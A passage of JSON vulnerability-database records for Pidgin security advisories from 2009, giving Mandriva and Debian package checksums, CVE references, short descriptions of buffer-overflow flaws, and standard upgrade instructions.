http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3025\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3026\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2703\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3083\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3084\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3085\r\n http://pidgin.im/news/security/\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n dd2135de88f01028217b4146dbfdabc0 2009.0/i586/finch-2.6.2-1.1mdv2009.0.i586.rpm\r\n 0a62ef0d115db1d059ba8683d8b78543 2009.0/i586/libfinch0-2.6.2-1.1mdv2009.0.i586.rpm\r\n d9138da684311ab0e77748b5d9251324 2009.0/i586/libpurple0-2.6.2-1.1mdv2009.0.i586.rpm\r\n a795ae8b0a6d37dae3cdd5d626a1054b 2009.0/i586/libpurple-devel-2.6.2-1.1mdv2009.0.i586.rpm\r\n e02ee9ac19b50b6313ab7e95955fc7dd 2009.0/i586/pidgin-2.6.2-1.1mdv2009.0.i586.rpm\r\n d9da1b8df1a61a3c6a61fb661d0af935 2009.0/i586/pidgin-bonjour-2.6.2-1.1mdv2009.0.i586.rpm\r\n fa74aa490a4a78a443f78273bd80c129 2009.0/i586/pidgin-client-2.6.2-1.1mdv2009.0.i586.rpm\r\n fba34f0c6056aaeda170fb38bafc50f8 2009.0/i586/pidgin-gevolution-2.6.2-1.1mdv2009.0.i586.rpm\r\n aa062eba94ee8a8857241879f83bb680 2009.0/i586/pidgin-i18n-2.6.2-1.1mdv2009.0.i586.rpm\r\n 3583204db49425789559de87f9c20e84 2009.0/i586/pidgin-meanwhile-2.6.2-1.1mdv2009.0.i586.rpm\r\n 83e2b09d13dc5880ce3779a659fa6edd 2009.0/i586/pidgin-mono-2.6.2-1.1mdv2009.0.i586.rpm\r\n 13115c52a371163466c9f8fb02c3b3f1 2009.0/i586/pidgin-perl-2.6.2-1.1mdv2009.0.i586.rpm\r\n 57c8369439d8ac73444f881e47bc7c7b 2009.0/i586/pidgin-plugins-2.6.2-1.1mdv2009.0.i586.rpm\r\n 1fe519efa96037e5b95360e6967fa872 2009.0/i586/pidgin-silc-2.6.2-1.1mdv2009.0.i586.rpm\r\n ab47db7786ec117a66317dc91328117c 2009.0/i586/pidgin-tcl-2.6.2-1.1mdv2009.0.i586.rpm \r\n 3c72a8f93d85a71a5ec62065c71ac866 2009.0/SRPMS/pidgin-2.6.2-1.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n abe40e3b46e70d0f74c5b4195d4a7573 2009.0/x86_64/finch-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 1895ed3c44f5eb3bf08bba3d0d44329a 2009.0/x86_64/lib64finch0-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 16bcdf679539693dea8d115d6f4f57fa 2009.0/x86_64/lib64purple0-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 5359a59e9ddd524f3fe2e61374391e6c 2009.0/x86_64/lib64purple-devel-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n c59fedcacf46d230776c1fa588d2370d 2009.0/x86_64/pidgin-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n e4f7f1dded3d1de9ba3a7cb3251382ab 2009.0/x86_64/pidgin-bonjour-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 9c8326b381dc152f4121ab43104fca70 2009.0/x86_64/pidgin-client-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n c7f718a011414a1c2a30dc3c765fa57f 2009.0/x86_64/pidgin-gevolution-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 5a272130a6b76313263567fa4e4eb405 2009.0/x86_64/pidgin-i18n-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n c7ca5393d5b3c26c7969e1935f0f081f 2009.0/x86_64/pidgin-meanwhile-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n a352742a2c74ab2dee0fe923d8088b09 2009.0/x86_64/pidgin-mono-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 3a7ea7015ba7e4631629a6561969c5f1 2009.0/x86_64/pidgin-perl-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 673250d99488d52ac182234a977270c5 2009.0/x86_64/pidgin-plugins-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n b0b24b820b40b8ae0ea50b861cb24816 2009.0/x86_64/pidgin-silc-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n cde1df5b06fdd9a7f3abdacd519a4ded 2009.0/x86_64/pidgin-tcl-2.6.2-1.1mdv2009.0.x86_64.rpm \r\n 3c72a8f93d85a71a5ec62065c71ac866 2009.0/SRPMS/pidgin-2.6.2-1.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n a0dae5ebcc277d8a42dfbbbc273e2e7c 2009.1/i586/finch-2.6.2-1.1mdv2009.1.i586.rpm\r\n 3e31c84ecf92b24da7e63fda3e6bc57e 2009.1/i586/libfinch0-2.6.2-1.1mdv2009.1.i586.rpm\r\n 6c2e1b9d19fc77f438517512666d8015 2009.1/i586/libpurple0-2.6.2-1.1mdv2009.1.i586.rpm\r\n 924014945b93ced26931d96e7872b2ae 2009.1/i586/libpurple-devel-2.6.2-1.1mdv2009.1.i586.rpm\r\n 0c78dd3ef63b1e14bc1f881a8c15fecb 2009.1/i586/pidgin-2.6.2-1.1mdv2009.1.i586.rpm\r\n 3038bfbd661e5d467dec2c2ac9550b16 2009.1/i586/pidgin-bonjour-2.6.2-1.1mdv2009.1.i586.rpm\r\n ea7a7a8d951f6deb0d68cfc162868a6a 2009.1/i586/pidgin-client-2.6.2-1.1mdv2009.1.i586.rpm\r\n cb312d06aa0365d38e393c7625171e62 2009.1/i586/pidgin-gevolution-2.6.2-1.1mdv2009.1.i586.rpm\r\n c8bfc1d06999ea0db358cbb008e51094 2009.1/i586/pidgin-i18n-2.6.2-1.1mdv2009.1.i586.rpm\r\n b46996777660d0818dc1c3987ab698dc 2009.1/i586/pidgin-meanwhile-2.6.2-1.1mdv2009.1.i586.rpm\r\n c761eb32c26ffd738b2ad3b61f78c011 2009.1/i586/pidgin-mono-2.6.2-1.1mdv2009.1.i586.rpm\r\n aaba734ce1fd0425395132ce28e76c6b 2009.1/i586/pidgin-perl-2.6.2-1.1mdv2009.1.i586.rpm\r\n 4b7f6d886dda8a7e89a56e6cd459b888 2009.1/i586/pidgin-plugins-2.6.2-1.1mdv2009.1.i586.rpm\r\n 28c71dbe522e6c2315c0092b5c68f6a6 2009.1/i586/pidgin-silc-2.6.2-1.1mdv2009.1.i586.rpm\r\n 0aaa2db43643a3f2a471b5d29b89e794 2009.1/i586/pidgin-tcl-2.6.2-1.1mdv2009.1.i586.rpm \r\n 3607769d564d6cead9e66ddc97e90c26 2009.1/SRPMS/pidgin-2.6.2-1.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 5996a662fd63ef72540432b9e723e376 2009.1/x86_64/finch-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 5daefd3daff1323ae6befca7ffeccf6d 2009.1/x86_64/lib64finch0-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 29c6cff6af5047f1c1e8c0e9cab1b343 2009.1/x86_64/lib64purple0-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 129363e98df30501bb591131f3b71974 2009.1/x86_64/lib64purple-devel-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 1dca4950a84ee467a1db32e33c272493 2009.1/x86_64/pidgin-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n efc25c6b71ae970de073641feed3d222 2009.1/x86_64/pidgin-bonjour-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n f57802d311e6676c359db58ce4f6c898 2009.1/x86_64/pidgin-client-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 3673312d1746554834679c0dd66f900a 2009.1/x86_64/pidgin-gevolution-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 6b4edbc3cbd95c4b73f199ec3dd07544 2009.1/x86_64/pidgin-i18n-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 07ddc3ebd9baa319fa42327ace7a51c1 2009.1/x86_64/pidgin-meanwhile-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n d3c41c1ef9cd7baa9febd7d073ef09a4 2009.1/x86_64/pidgin-mono-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 6ce2b600ff76999460c7e8ed7ef81904 2009.1/x86_64/pidgin-perl-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n d8be6a2e6bbba229edd7d7abcbf2ef76 2009.1/x86_64/pidgin-plugins-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 7ae3fdc1561a478052e2a3fe65488966 2009.1/x86_64/pidgin-silc-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 308d2a35011d9093973b393199de7393 2009.1/x86_64/pidgin-tcl-2.6.2-1.1mdv2009.1.x86_64.rpm \r\n 3607769d564d6cead9e66ddc97e90c26 2009.1/SRPMS/pidgin-2.6.2-1.1mdv2009.1.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 6a1a28fb7bb3037ae1528e792417300b mes5/i586/finch-2.6.2-1.1mdvmes5.i586.rpm\r\n 7f56781f36c71c0839741b728586ef85 mes5/i586/libfinch0-2.6.2-1.1mdvmes5.i586.rpm\r\n f45ee50ed79e8101375a9236f937d658 mes5/i586/libpurple0-2.6.2-1.1mdvmes5.i586.rpm\r\n b0455640d7149d9ad025ae42fce61b72 mes5/i586/libpurple-devel-2.6.2-1.1mdvmes5.i586.rpm\r\n 487fa34cda5ebd172673c4232a3009d3 mes5/i586/pidgin-2.6.2-1.1mdvmes5.i586.rpm\r\n 38220a322dc8b3fc2a264fb2bae2e54f mes5/i586/pidgin-bonjour-2.6.2-1.1mdvmes5.i586.rpm\r\n 9a6d4add9297029d774a3f4483be769f mes5/i586/pidgin-client-2.6.2-1.1mdvmes5.i586.rpm\r\n 5b4b62dd8555dc4b43d475c5dc04ff37 mes5/i586/pidgin-gevolution-2.6.2-1.1mdvmes5.i586.rpm\r\n adb1072ce88c0a95afb2a41b07471f69 mes5/i586/pidgin-i18n-2.6.2-1.1mdvmes5.i586.rpm\r\n 3f2d24e39f650e1ce198b3555881d52f mes5/i586/pidgin-meanwhile-2.6.2-1.1mdvmes5.i586.rpm\r\n 70cc2085acb78b0a75df07c8d44122a6 mes5/i586/pidgin-mono-2.6.2-1.1mdvmes5.i586.rpm\r\n 2fc80c8e5d350ea77dbaf3bf53e738c9 mes5/i586/pidgin-perl-2.6.2-1.1mdvmes5.i586.rpm\r\n 9bb6bb95f035abec1d8db99fb7a95a94 mes5/i586/pidgin-plugins-2.6.2-1.1mdvmes5.i586.rpm\r\n 0e8e10245b3b2b2793e9830ebad65c9f mes5/i586/pidgin-silc-2.6.2-1.1mdvmes5.i586.rpm\r\n 87005bd59df0e60db09773f5ad51c65c mes5/i586/pidgin-tcl-2.6.2-1.1mdvmes5.i586.rpm \r\n c5ba16d383624512a2accea0e49127e1 mes5/SRPMS/pidgin-2.6.2-1.1mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 48559a9fbd602829a9018da470c737b7 mes5/x86_64/finch-2.6.2-1.1mdvmes5.x86_64.rpm\r\n efc52b721d74bd54957d8381160930ae mes5/x86_64/lib64finch0-2.6.2-1.1mdvmes5.x86_64.rpm\r\n cfa40992e6268de48742d863937a3ce5 mes5/x86_64/lib64purple0-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 551c32363db750e426e3ba6aa482aa1b mes5/x86_64/lib64purple-devel-2.6.2-1.1mdvmes5.x86_64.rpm\r\n f772d231fa7f5bfa83d7448b977ac9e4 mes5/x86_64/pidgin-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 5e36d866ed4aead171f62b0ff52f86de mes5/x86_64/pidgin-bonjour-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 8e93da5c587e1fc463c23a1e202c506f mes5/x86_64/pidgin-client-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 35a37384b53cb597b796ce269b947c0c mes5/x86_64/pidgin-gevolution-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 6d8a79d2da3c94034e9db65464304cba mes5/x86_64/pidgin-i18n-2.6.2-1.1mdvmes5.x86_64.rpm\r\n be05186873330aca1a05143c7380b5e1 mes5/x86_64/pidgin-meanwhile-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 669c51511f0c04f40779dd73e0c9f50d mes5/x86_64/pidgin-mono-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 79bd83d747fa3e48d2ce18e8e5abb588 mes5/x86_64/pidgin-perl-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 48eb4e61676abc78e769a0f660148814 mes5/x86_64/pidgin-plugins-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 6c37ac6cbf4e83b8a4e09bfc62776d73 mes5/x86_64/pidgin-silc-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 47262f2e661db28512c40710d9a59113 mes5/x86_64/pidgin-tcl-2.6.2-1.1mdvmes5.x86_64.rpm \r\n c5ba16d383624512a2accea0e49127e1 mes5/SRPMS/pidgin-2.6.2-1.1mdvmes5.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFKqkbImqjQ0CJFipgRAmItAKDwmkCL6bbeJfrQn7f0X8X1kUsE/gCeJQLu\r\neZC/xky0aMktS6+I56SNZh0=\r\n=rl3L\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2009-09-14T00:00:00", "title": "[ MDVSA-2009:230 ] pidgin", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:31", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-3084", "CVE-2009-3085", "CVE-2009-3025", "CVE-2009-3083", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2703", "CVE-2009-2694"], "modified": "2009-09-14T00:00:00", "id": "SECURITYVULNS:DOC:22463", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22463", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "references": ["https://vulners.com/securityvulns/securityvulns:doc:21887", "https://vulners.com/securityvulns/securityvulns:doc:21869", "https://vulners.com/securityvulns/securityvulns:doc:20089"], "description": "Memory corruption on malcrafted filename in MSN protocol. Buffer overflow on Jabber file transfer. Buffer overflow in QQ protocol.", "edition": 1, "reporter": "BUGTRAQ", "published": "2009-05-26T00:00:00", "title": "Pidgin memory corruption", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:30", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Pidgin", "version": "2.4", "operator": "eq"}], "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-05-26T00:00:00", "id": "SECURITYVULNS:VULN:9114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9114", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1805-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nMay 22, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : pidgin\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2009-1373 CVE-2009-1375 CVE-2009-1376\r\n\r\nSeveral vulnerabilities have been discovered in Pidgin, a graphical\r\nmulti-protocol instant messaging client. The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2009-1373\r\n\r\n A buffer overflow in the Jabber file transfer code may lead to\r\n denial of service or the execution of arbitrary code.\r\n\r\nCVE-2009-1375\r\n\r\n Memory corruption in an internal library may lead to denial of\r\n service.\r\n\r\nCVE-2009-1376\r\n\r\n The patch provided for the security issue tracked as CVE-2008-2927\r\n - integer overflows in the MSN protocol handler - was found to be\r\n incomplete.\r\n\r\nThe old stable distribution (etch) is affected under the source package\r\nname gaim. However, due to build problems the updated packages couldn't\r\nbe released along with the stable version. It will be released once the\r\nbuild problem is resolved.\r\n\r\nFor the stable distribution (lenny), these problems have been fixed in\r\nversion 2.4.3-4lenny2.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 2.5.6-1.\r\n\r\nWe recommend that you upgrade your pidgin packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2.dsc\r\n Size/MD5 checksum: 1784 3cfbe1a429a466d82ca72b8c1ac40754\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2.diff.gz\r\n Size/MD5 checksum: 67015 ca8a67c8a5fbb7952c39e96dfc1c92d6\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\r\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 133450 0da42200c15fa112d10949833c7b656d\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 276786 98123cf4a705addb4f011b1a9aa42806\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 159310 af40922a5c347da65bb3287d7832f488\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 193330 79cfc03245a6ee2d54f3f1f8f2437f97\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 7018686 2c14cc93703b4d57f1134280ef019f87\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 776034 998feb438dce3551770cc3f98576246b\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 5543240 5190a80c71672e30de68d6f5ce3385f5\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 370102 6ca853190995d40ffe833c19a9d0b130\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 1800160 f6d957047912550df9f2876cc3ae7d8a\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 5669542 1e21b6071f0947ac4153147ff07bb546\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 727040 bef84ab7a06038f3c47532809873823f\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 347640 8d9b18516cb3f836cafed50fca1425dd\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 1713090 e6224ab98f1d68df3cb10a6c2033bf06\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 656814 240d7bf1b6f79ad6a31fed92eedf6080\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 5358320 f7c4ea8a35083db8e461bad0b70906fa\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 316126 68b0666de2045a8574f7d50919883858\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 1490918 46ae049e5cb0539870f305e4868e2e42\r\n\r\narmel architecture (ARM EABI)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 5383624 73ae62f4b416c5ebfc792231c66f8ca1\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 319456 546b24abfb2c38aa2572ba90c48bc095\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 667564 a30c4906f3ad9ca042741c122b99cf31\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 1494952 a51898e2f3766423dbe6b584769b6db0\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 753668 f70ef43544c55771852789bec4bf94e0\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 5489574 64a4227ef892258851004c21841b94e6\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 361010 52121ede100f605ea53423fff2d7300a\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 1827456 aacc5b3a8fadc0d4576e7a191c457e68\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 1584030 b7241b147ae106b236b3c19860b3fd04\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 680872 399492517586fb1277892bd3fb3bf7b5\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 5374090 0408715682fda4b1fcb1945e7d6770ee\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 326552 eba36a04da368b35f858a88f1034469c\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 948018 def22510f06bbb084d56b6c402a474cc\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 2194234 8891d61cba33f2a9e434e7e12541a636\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 434572 19b4d9631440cf2fe92abfd032ed8bfd\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 5223568 d6e5076c460293e3265147b26434c1d8\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 5655552 3939bde10319e1ed310d607f782e692e\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 653818 5ba191b2eb2d299ab36f8f08a2261bf4\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 318128 3e41d036421525584379abce4d893d17\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 1373126 f4d12c42ad8577233f6f289e5ee27a49\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 318118 2f291b88715934b7ab36f6f551e5bb25\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 1358266 ca0716e2a4bcf3d6737913a6f13b03ab\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 650804 258c2a0b93d7714120346ec6037c79f2\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 5544090 ff48eadd054ae5c758920e8ca8f42df4\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 1760236 03b52ff4df575157cc21ed1b86e925af\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 362840 9f65e44425a193783f9f1201050a6be3\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 5578900 0e70281f616a1cd67d02c4a5e07c776f\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 753758 642d77cf4334d7c4aa8a84bb7d9699f8\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 717168 cd1cb86f77fe1e618d9672d28af70170\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 5566916 20978bccaccbc40cbc5d4724627f148c\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 358728 8bab5444b68d96d61ad17d4a06572828\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 1645716 c70783f5beacb8de41aecec6716f1a5a\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 5138450 93d398c20768690981b72145004b55cb\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 682926 4487a4faeb57750c1b63a437caefee8c\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 1587786 2d2a043944b81d6cbcedf092c9f6e005\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 327572 9dcaa99102693093ef770e24e748dd0c\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: 